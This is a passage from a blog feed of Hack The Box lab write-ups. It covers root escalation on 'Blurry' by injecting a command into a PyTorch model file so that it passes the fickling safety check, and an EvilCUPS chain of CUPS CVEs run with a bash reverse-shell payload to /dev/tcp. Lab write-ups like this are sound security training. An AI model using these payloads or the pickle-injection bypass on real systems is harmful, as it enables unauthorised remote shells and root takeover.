class="language-text">exec</code>, <code class="language-text">eval</code>, and <code class="language-text">runpy</code>—to execute commands. These options can potentially bypass security checks, including those performed by <code class="language-text">fickling</code>.</p> <p>So I transferred a copy of <code class="language-text">demo_model.pth</code> locally and then installed <code class="language-text">torch</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ pip install torch</code></pre></div> <p>Next, I used the PoC (<code class="language-text">torch_pickle_inject.py</code>) to embed the <code class="language-text">bash</code> command using the <code class="language-text">system</code> option against the demo model (<code class="language-text">demo_model.pth</code>):</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ python3 torch_pickle_inject.py demo_model.pth system "bash"</code></pre></div> <p><code class="language-text">torch_pickle_inject.py</code> creates a backup of <code class="language-text">demo_model.pth</code> called <code class="language-text">demo_model.pth.bak</code> and poisons the original. So I renamed <code class="language-text">demo_model.pth</code> to <code class="language-text">demo_model_1.pth</code> and transferred it over to Blurry. Then, running it as <code class="language-text">sudo</code> spawned a shell as <code class="language-text">root</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model_1.pth [+] Model /models/demo_model_1.pth is considered safe. Processing... root@blurry:/models# id uid=0(root) gid=0(root) groups=0(root) root@blurry:/models# cd /root root@blurry:~# ls datasets root.txt</code></pre></div> <p>I tested each of the options in the PoC (<code class="language-text">system</code>, <code class="language-text">exec</code>, <code class="language-text">eval</code>, and <code class="language-text">runpy</code>). Both <code class="language-text">exec</code> and <code class="language-text">eval</code> get evaluated as "OVERTLY_MALICIOUS". However, <code class="language-text">system</code> (as shown above) successfully bypassed the <code class="language-text">fickling</code> check, <code class="language-text">runpy</code> also works.</p> <p>Running <code class="language-text">torch_pickle_inject.py</code> against the demo model to embed the <code class="language-text">bash</code> command using <code class="language-text">runpy</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(venv)─(kali㉿kali)-[~/Desktop/HTB/Blurry] └─$ python3 torch_pickle_inject.py demo_model.pth runpy "import os; os.system('bash')" </code></pre></div> <p>Same as with <code class="language-text">system</code>, I transferred the poisoned model to Blurry and ran the evaluation script as <code class="language-text">sudo</code> to get a <code class="language-text">root</code> shell:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model_1.pth [+] Model /models/demo_model_1.pth is considered safe. Processing... root@blurry:/models# id uid=0(root) gid=0(root) groups=0(root)</code></pre></div>https://mgarrity.com/hack-the-box-evilcups/https://mgarrity.com/hack-the-box-evilcups/Tue, 15 Oct 2024 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7e9c52403237bb324880a291fbdd07fb/3b67f/evilcups.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABAklEQVR42mMQkdX+jwuLymn/F5LW/s8jpvVfUBrCx6cehBnwGcYjofVfSkX3v4GpPpjmlSRsKAMuw/iAmi1Ndf+3+aj+X+4h97/DV/W/qbEuWByfoVgNBHlTGuiijgCN/yszM/+vmrb0/+rU5P9dwVr/xZV0/gvLkGAgyHZeCe3/evqa/2en2vzfvnLb/4Pr1vzfsWjN/1nZzv91dTX+80vp4HQldhcCXSCjpP2/MlTvf6yb6/8UZ+//sS7O/6vDgWGpqE2aC0FYDOpKMyOd/6V+av9rfFT+F/mo/Tc11CEYMXhjGaRZRln3v7Gx3n8pJcIRgtdAmEtB3uOX1ILzCaVDABN7CBthDw3tAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="EvilCUPS" title="" src="/static/7e9c52403237bb324880a291fbdd07fb/50637/evilcups.png" srcset="/static/7e9c52403237bb324880a291fbdd07fb/dda05/evilcups.png 158w, /static/7e9c52403237bb324880a291fbdd07fb/679a3/evilcups.png 315w, /static/7e9c52403237bb324880a291fbdd07fb/50637/evilcups.png 630w, /static/7e9c52403237bb324880a291fbdd07fb/fddb0/evilcups.png 945w, /static/7e9c52403237bb324880a291fbdd07fb/3b67f/evilcups.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>EvilCUPS is a Linux machine affected by several vulnerabilities discovered in CUPS (Common Unix Printing System) in September 2024. These vulnerabilities (CVE-2024-47176, CVE-2024-47076, CVE-2024-47175, and CVE-2024-47177) can be chained to achieve RCE by giving an unauthenticated attacker the ability to add a malicious printer to the machine, and when a print job is executed, arbitrary commands are run. In this case, exploiting these flaws results in a shell as the <code class="language-text">lp</code> user. This user's permissions can then be leveraged to read a print job from the cache containing the <code class="language-text">root</code> user's password.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EvilCUPS] └─$ nmap -sC -sV -oA nmap/output 10.10.11.40 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 13:19 EDT Nmap scan report for 10.10.11.40 Host is up (0.062s latency). Not shown: 998 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0) | ssh-hostkey: | 256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA) |_ 256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519) 631/tcp open ipp CUPS 2.4 |_http-title: Home - CUPS 2.4.2 | http-robots.txt: 1 disallowed entry |_/ Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 74.08 seconds</code></pre></div> <p>As shown in the Nmap output above, the machine was running CUPS on TCP port 631, so I checked UDP port 631 since CUPS uses it for printer sharing and discovery, it was also open:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EvilCUPS] └─$ sudo nmap -sU -p 631 10.10.11.40 Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-10-11 13:21 EDT Nmap scan report for 10.10.11.40 Host is up (0.041s latency). PORT STATE SERVICE 631/udp open|filtered ipp Nmap done: 1 IP address (1 host up) scanned in 0.74 seconds</code></pre></div> <p>Next, I visited the web interface by browsing to <code class="language-text">10.10.11.40:631</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/29b21239140f448247b13fa88c3746ef/bf05b/cups-gui-home.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 60.75949367088608%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAMCAYAAABiDJ37AAAACXBIWXMAAAsTAAALEwEAmpwYAAABiElEQVR42qVS2Y6CQBAEBhhulFMQ8YgKPi0++w3+n3/b2zUgibsmbrIPlaGvquoZtKqq6HQ60eVyod1uR/f7nR6PB91uN5U/Ho/UdR31fU/n85nRcdyreL1eU9M0L9DSNKW6rhWQKMuSkNvv95TnBa1WFTmOQ5qm/Q1JkignIGvbVrnE93a7YbJS5cIwJNu2yTRdEsIjy3JYRJKUIyBoWdZI6Ps+O8kV4CzPM0qSguK4psWiYbKM3Ve02TRUFC33tNxTqRy2wkwQBOS67kgI5iiKlApcIDYMgyFY3WM47EqQruucG4E+EKAX+V8r44KxGoD1QS6lTdfrQMPwpa7hSYAh9AzDoOaezmZiIVwezhhLHghmJbg4HA5KBCdI4zhWNayKGH9AlmWvDk3TY5WCXSWMbELB5OEklDL5ks+cH2UUtKxorjlOrmY0bV79/fMbhkWeVzFWChCFCGpSLjjOJyPZVIs+EZqKCAM/r+MD3hd0XZDvN7xuzK/scGz+nxBrwBkcCiH/RPgNtrYTGUh6cf4AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI home page" title="" src="/static/29b21239140f448247b13fa88c3746ef/50637/cups-gui-home.png" srcset="/static/29b21239140f448247b13fa88c3746ef/dda05/cups-gui-home.png 158w, /static/29b21239140f448247b13fa88c3746ef/679a3/cups-gui-home.png 315w, /static/29b21239140f448247b13fa88c3746ef/50637/cups-gui-home.png 630w, /static/29b21239140f448247b13fa88c3746ef/bf05b/cups-gui-home.png 863w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Access to the Administration page was forbidden:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 298px; " > <a class="gatsby-resp-image-link" href="/static/1725d4a8a3f40f5f441bda6fdeb0d552/fa9f6/cups-gui-admin.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 68.35443037974683%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAOCAYAAAAvxDzwAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2UlEQVR42uWSuwqDQBBFVz/B91tBBG0UBMHKxs4PEEG0VRv/v7thFhKIIW4CwSbFgdk7O5eZ2WWMMUiS9ARpR/2uCZFl+bsCEV3XIcsypGmKtm1RVRXKskTTNBw6F0UBwzAeXZ8a1nWNvu8xDAOmacK6rhjHEfu+Y1kWbNuGeZ6R5zkvoIkEXb7u6myfH6yI4aeEYQhN02BZFqIogud5sG0bvu+Dcq7r8jgIAn4njmOef2uoKAp0Xec4jgPTNKGqKo/JjIrpDukUJ0nC9etGPn5qEdc/yv8Z3gCNSjIQR9dI5AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI admin page forbidden" title="" src="/static/1725d4a8a3f40f5f441bda6fdeb0d552/fa9f6/cups-gui-admin.png" srcset="/static/1725d4a8a3f40f5f441bda6fdeb0d552/dda05/cups-gui-admin.png 158w, /static/1725d4a8a3f40f5f441bda6fdeb0d552/fa9f6/cups-gui-admin.png 298w" sizes="(max-width: 298px) 100vw, 298px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Jobs page allowed active and completed jobs to be viewed:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/18577f1d09358bf13811690fadc1fcbc/dcb99/cups-gui-jobs.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 36.708860759493675%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA8klEQVR42qWRyW6DMBCGzf4CIBABgdgO6SVA0yDoNSwJRByjvAfP/9fjFtRFPeXwycx45vPYMMuy4Ps+oihCHMcIgkBAcZqm4jtJEriui3mesSwLwjCE53lwHEdg2/YGM01TNKqqCsbY8yiKAsMwIEkSZFkGxbRRFCWm6Ya+HzAMl43rdcT53KJp3lHXDZ/UF/XUL4RZlvGiCW3b8eYL7vcHuq5HWZYYx4nnei4avsSfchKeThWqqsZu5/0UUuJ4fEOeF9jvX3A45Fz2Cl3XxTPQxLSuaJq2rf9c+2+STiPhCj3J75iEVLdNtrImv/PMT/kA1dSumpx9IhAAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI jobs page" title="" src="/static/18577f1d09358bf13811690fadc1fcbc/50637/cups-gui-jobs.png" srcset="/static/18577f1d09358bf13811690fadc1fcbc/dda05/cups-gui-jobs.png 158w, /static/18577f1d09358bf13811690fadc1fcbc/679a3/cups-gui-jobs.png 315w, /static/18577f1d09358bf13811690fadc1fcbc/50637/cups-gui-jobs.png 630w, /static/18577f1d09358bf13811690fadc1fcbc/dcb99/cups-gui-jobs.png 890w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>"Show All Jobs" listed one completed job:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7fd6cf8e6a564ac1f64d333dbd23a702/20aec/cups-gui-show-all-jobs.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 50.632911392405056%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAKCAYAAAC0VX7mAAAACXBIWXMAAAsTAAALEwEAmpwYAAABdUlEQVR42qWSS2vCQBSFY3yggkl0Y1EDBRO1qBjjK1LIS1OxiAVx1+5Eib/A/hN/7unMlUQt7crFxx2Pl5M5hxEqlQp0XUe73SaazSbRarXQ6/XQaDRIr9frCIIA5/MZlmXRb1VViVqtFiPIskxiKpWCIAiPk81mUSwWkUwmSRBFkaamaRiNRuj3+zBN8w7DMNjNeYoXlMtP94Y88ng8YUt9OI6L5fId8/kbwjDE8Rhiv9/jcDjEcH2322G9/sBms2W1GGSUSCQuhryv1WoN3w/guj4zC7BYLFGt1uIb8+WI3xEvunj7n/DnUjqdRiaTgSRJ4D2XSiWakR59IKoommSoqs8s8is6nSljjG7XxHRqUV9Rj7w3fh4MBphMJnTmL8B1PZxO3xgOR1dDTdMxmy1g2z7r0acuHcdhy26MbdukeZ7H+ltju93S5E/p8/OLXaJ7NczlclAUmUWSYnjUW3jc6KwoCsFfR6FQQD6fpxr+7fARfgCdWQpZlcIsZgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI show all jobs" title="" src="/static/7fd6cf8e6a564ac1f64d333dbd23a702/50637/cups-gui-show-all-jobs.png" srcset="/static/7fd6cf8e6a564ac1f64d333dbd23a702/dda05/cups-gui-show-all-jobs.png 158w, /static/7fd6cf8e6a564ac1f64d333dbd23a702/679a3/cups-gui-show-all-jobs.png 315w, /static/7fd6cf8e6a564ac1f64d333dbd23a702/50637/cups-gui-show-all-jobs.png 630w, /static/7fd6cf8e6a564ac1f64d333dbd23a702/20aec/cups-gui-show-all-jobs.png 873w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The Printers page showed one printer on the machine:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6773b564a2d4da3dccb4d6a276ed5826/dcb99/cups-gui-printers.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 39.87341772151899%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABK0lEQVR42q2Ra4uCUBCGvUMuCelKF8wVhLaLuqVpkST5ufZHhIL65/qL73oGsmg/7n54OGfeOfMyM4ezLAvz+RzL5RJBEGCxWBCe52G9XlPO932sViu4ros8z3G73XC9XjEcDuE4Dmzb7uAMwyBxNBpBlmVwHPc3er0emZmmCVVVoSgKJEkiLYoi6vKZzWaDMAwxm30S06n9avoINE2Drhvo9/tUVFUV6rpG0zR0ZxRFgbIscbl843y+4HBIqZbn+Ychz3MQBJ5OFguC0D1gJ4tZ16IovhZT7k5nOJl8II7ztqus/Zy45Qu7XYLT6dTqcTfu8XjEdrvFfr9HlmVI05T0JEkwHo8fhqr61o5qYjB4h2GYNLau62AfxnbLYPc7LPcM09j+f+3wP/gBiXDM3bC820oAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI printers page" title="" src="/static/6773b564a2d4da3dccb4d6a276ed5826/50637/cups-gui-printers.png" srcset="/static/6773b564a2d4da3dccb4d6a276ed5826/dda05/cups-gui-printers.png 158w, /static/6773b564a2d4da3dccb4d6a276ed5826/679a3/cups-gui-printers.png 315w, /static/6773b564a2d4da3dccb4d6a276ed5826/50637/cups-gui-printers.png 630w, /static/6773b564a2d4da3dccb4d6a276ed5826/dcb99/cups-gui-printers.png 890w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Clicking "Canon_MB2300_series" brought up the administration page for the printer:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2cfb04989f105ddd2763857daaa5399e/dcb99/cups-gui-queue-name.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAAB5UlEQVR42o1T2W7aUBA1m7Exiw0EG2N2m0VBKlAFqBQa+pSGVeELmnfEexr1L/jf05mpjGiaSjwc3blj3zNnztyr2LaDRqOBdruNZrMFz6uiVqtRrkk5X74FQQDf91GtVjGZTHA6nbDf71EsFlGpVFAul89QLCuHer2GfN5Cp+Oj1wvooIdSqUjkFWiaBkVRrodhmLDtOizLoQoBHKdJ5DYKBY/2HuVNqGoShmEglUpB13VZGZxLJBLvCR3c3Hwikh5cd0bxkOKACAfUbhf9fg+tVguDwYDivqDb7VI3Hclxy9zFmXw+n+P19SeOxyNeXn7gcDjg7e0XdrudVIxEIn8p+Gh/CUXTdKrYE/Nd1yX/2M88tZaSH2KxGKLR6PUe8iHHcWRCTMRg+YxMJoNcLodsNivEVxGqqioe8VWxbZumW0I6nRYS0zSlAHvDhO/BykOcCS3LEnWcjMfjcpjB8bWquMuwKClMyFXgSfGaTCZFHRdiTzebzYfYbrdYLL7h/v4rptOp2CNK+TU8PS3x/LzH4+N3WXmv6xpdnQJWqxWWyz+4jNfrNR4eFkQ4x93dRISIYn5Os9kXDIcj3N4OMB5/xmg0FsWMyysR+hXG/7Hg3yR7Eb4IboUt4DWcPO85vhxQeP43ap1EiCeZAn4AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI Canon_MB2300_series printer" title="" src="/static/2cfb04989f105ddd2763857daaa5399e/50637/cups-gui-queue-name.png" srcset="/static/2cfb04989f105ddd2763857daaa5399e/dda05/cups-gui-queue-name.png 158w, /static/2cfb04989f105ddd2763857daaa5399e/679a3/cups-gui-queue-name.png 315w, /static/2cfb04989f105ddd2763857daaa5399e/50637/cups-gui-queue-name.png 630w, /static/2cfb04989f105ddd2763857daaa5399e/dcb99/cups-gui-queue-name.png 890w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Notably, the "Maintenance" dropdown can be used to print a test page:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 119px; " > <a class="gatsby-resp-image-link" href="/static/4d4809effdef317dc7940d3683a2cde0/36718/maintenance-dropdown.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 151.26050420168067%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAeCAYAAAAsEj5rAAAACXBIWXMAAAsTAAALEwEAmpwYAAAFE0lEQVR42o1WWW9bVRC+/wOBgIqlz4CQWh54AdE/wCvqAw+8UCFU2tKmFSioFSptWl54ohuIkraJHTeO9yVpSmQnaUXdOG4WL/fa19v1dq+v1+Rj5jhOGyctPdKnOWfO8dyZ78zMsRQI3EcqpWJ1NSlkIpGGLGfFXFFyArxmyToGr9fXZYG1tRSSyQzy+TICgVlI0egqbt4cFfD5gnA6vXC5vJiacmF6ehZebxDBIMsAZmfnMDcXFlLTqsjlNJTLOsLhB2RshozLkGKxOFxuHyYnHbh+/U/cujUGh8ON27fHMTp6R8yvXr0h1na7E+MWG6zWSRQKFaTTefKsgkgkhlBokaLLQLp29Q/oNQNZNYtMOoNcNifmDJ4z1Iy6re+fYclIK2naz8Ksm7hy5Tqk5ehj8NjodjE4Njc3n10N6J9iY6P32+hSBFK304ZuGJAVBUVNQ6vVglGvC12j2USn00GTdF36YJPW7XZbYGNjY9eHmw0TUqfdgpxWMTpmgYuItzvd8AamBabocvzT9wSmXB6hCy8+hJsuL7ayJox0upsCbNIwdEgN06RwO+i2DJi6hlpRQb1aQl2voKnn0TDKMKpF0sswaiWYNQ2Nag7dtrlNRd9Ds25AiqtVXPToOO+q4ZLXwK+BBkZIXvTquOAxhO6yj+A3xTnWXfbXMULzX5xlXHBXcJ7kiKeGuFqBZAkX8NqxFA6eVfD2yRQhiX0nkniH5Mc/p4V89WgCb32fxP5TKRygc28eT+D1Y8lt7KP1K0dTGA/l2WARhy7lMHy3hK9uFHDkryJOW0v4/Lcsvvg9j29uFnH8joZv/9ZwmNbf3dZw9JaGr+nckEXDl9cK+PAnBe8NZ2CbL0AaDxXw7pCCj84pOHgujU8vZPDZSEYcen9Yxie0PjSiCrB3HwwrYn74Sl4YO3A2jf1DSbxxQu55uKJU8YOtgjPWMk7TF0+NaTg5VhTzM1aNvC3j1DjpCEOWIulKOHGnt3/aUiJdCT/aNAxPVvBEIQ5Ns967q26bEwq7s7tD6t1Jv1cBiFvmxJapfCbu2vF4KYp4PIHocgyPHi8hQ6Xm8ngx+88c/n0UwcKDhwgtLCJC52Irq5Tcm8IHljzqVAxSu9VEpVJBLp/Hvdn7CM8vIBQOw+31Ym19HflCAelMBhH6wKNIBPOLiwjO3MN6PL7t3Q4PzXp9xwaXGJfVswcHwxvU7zDY2OKwu9Uc9qLxxU1jwCDXcqFYpDBmkJJlxBNJ0Sh6kKmRaiK86PIyVoi3Uqm0y+hOg62eQX8wCF8gCI/XT/z5EJqfFwb4I8zZNIH3mcMXGuxzyCG3qVVVazXBIbcooeN2RXoGtzLW9XnsG3rupezN18tzKgy2KeRSuUw5uESvVwq6rhMMoTOptS1S7jGHrM/mcvQolZFIJkUk7PEel9KGSm/E5NQUPD6f4DI4PQOn24P1RALj1gk43G6Ri4EgNV6/n8464HC6UKlWn582zBW3/0ajAZPQ54ufgTp5ynvsMe/3wM9D9+U4HJxv/g+ROwzyw8LecEj9CukneX3LI+ZOzWYFj7Ut7rhcnxbDQB5yc1iOPcF9agIOl1vI8MICbHY7lHQadocTtkk7/fWIiybBDYN1TjqbTKW2PTX0GqRWsyE8y5EXXCW5fEFUR0ZVBWrkFZOv0j5LjSqFPWZwVGXytD/4PiTbhHXrUlrisedweN4Vl0LJvDUXe5zsrH8GrOOXk8eExYL/ADDIeRqMAXmvAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Maintenance dropdown" title="" src="/static/4d4809effdef317dc7940d3683a2cde0/36718/maintenance-dropdown.png" srcset="/static/4d4809effdef317dc7940d3683a2cde0/36718/maintenance-dropdown.png 119w" sizes="(max-width: 119px) 100vw, 119px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Recently, a researcher discovered a vulnerability chain consisting of four CVEs in CUPS that leads to RCE, detailed <a href="https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/" target="_blank">here</a>. Based on the original exploit script, the creator of this HTB machine wrote a PoC, which can be found <a href="https://github.com/IppSec/evil-cups" target="_blank">here</a>. The PoC creates a fake printer on the target machine that, when used to run a print job, can execute a specified command. I cloned the script and ran it, specifying a reverse shell command:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/EvilCUPS/evil-cups] └─$ python3 evilcups.py 10.10.14.15 10.10.11.40 "nohup bash -c 'bash -i >&amp; /dev/tcp/10.10.14.15/443 0>&amp;1'&amp;" IPP Server Listening on ('10.10.14.15', 12345) Sending udp packet to 10.10.11.40:631... Please wait this normally takes 30 seconds... 20 elapsed target connected, sending payload ...</code></pre></div> <p>After running the exploit, a new printer was added:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/d74f627aaae07b9c55d2be1e75416a41/20aec/cups-gui-new-printer.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 46.835443037974684%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABb0lEQVR42qWSaYrCQBCFE6OoIBphcI1ZxKAMEqO4ZjGRhIlzAREUb+AZPPqbrpb0hPk7Px7VS9XX1cWTOp0ORqMRDMPAeDyGaZpiPZvNeLRtG5PJBJZlYTqd4vV64fl8ot/vYzAYoNvtCkkEpCJd11GtViFJ0v9UqVSgqira7TZarRbq9TpqtRrv6nw+I0kSrjRNhbIsg+d5WK3WWCxcBpIhy3IOfZPpoNlscmij0WCJC9xuNzweD6H7/Y7L5YLr9YqvrwzHYwzfD/92KaFUkqEoCo/vfUm8SJH2uYrneSyXy7xeADVNx24XYL32MJ+7cBwX+/0eQRBguVzybuM4xmazwXa7ZV357Ms+XNdl+XOeq2naL9A0bVb8zaApu0xwOMQMEHHI6XRiXzty5TA6I4VhyGFRFHGnCKCqfjDoJ3vFwnBosEtL2IRsRA4gi/R6PW4lx3GEpchilEPzF8B8ToryVnFmuWhGReXzLOYQ8Ad5mO9X50K8NgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="CUPS GUI new printer" title="" src="/static/d74f627aaae07b9c55d2be1e75416a41/50637/cups-gui-new-printer.png" srcset="/static/d74f627aaae07b9c55d2be1e75416a41/dda05/cups-gui-new-printer.png 158w, /static/d74f627aaae07b9c55d2be1e75416a41/679a3/cups-gui-new-printer.png 315w, /static/d74f627aaae07b9c55d2be1e75416a41/50637/cups-gui-new-printer.png 630w, /static/d74f627aaae07b9c55d2be1e75416a41/20aec/cups-gui-new-printer.png 873w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I started a listener with <code class="language-text">nc</code>, then went to the administration page for the HACKED_10_10_14_15 printer and selected the "Print Test Page" option from the dropdown:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/4b4d97aae1b314574d3edb0ac4692afc/45929/cups-gui-print-test-page.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 67.08860759493672%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACEklEQVR42o2Tu48SURTGh0d4DG8YYHjvskvYGWx2TdasyEMghiyw5S6R2CwL2UKtoDCxsbPyUdtYaGMsTPwzLG1sjLWxM1Q2n+ccMhsSccMkv9xz79z73fO6iqZpyGSyyOVyRB7pdJrI0FoGW1vbMhYKBeTzeWSzWbFnsxnG4zHi8TgSiYTANqPoegJ7eyWUyyURSyaTQiqlIxaLIhKJQFGUzQkG4+SFQWK7dFhHIBBHMKjRqNE8AU2LQVVV+P1+Wg+KHQgEruZsM3a7fSnoVVOIagcIhW8gGt0h70zyrEhiOxRiGZWKiWKxCNM0ya5QJGWhVCrBMAyB/4XDYTidTigP7p/h08f3ePf2DR4/eojpdIL5fI7RaCQ32my2jULlfbL38skLfP4GfPjyG0e1NlSvlzyNUTghCcPhcPyDdcnay54+e44fv/7g6/efOLpdhdvtBleei8GEQiH4fD6Bc8a5u9br169egr/FYoFutysiuq4LVjtYQjxahfmvYKfdpr6aYzgcLvuIFjm5VnibtgvvlUqz+1bJXS6XhMywF7qeQq1WX0uj0cDh4S3s798kDqgzYksdfh3N5l0cH/dRrzfR6w3oQAMej0dex8XFRF7FKufnY0wmU5yenmEwOEG/fyKC4q1hmCTWI9EWqtU76HTuodVqS86kr9a1xvXhr8+Hz6deVZYrvfo6uIl5vppr66K/BhVfJibxDpUA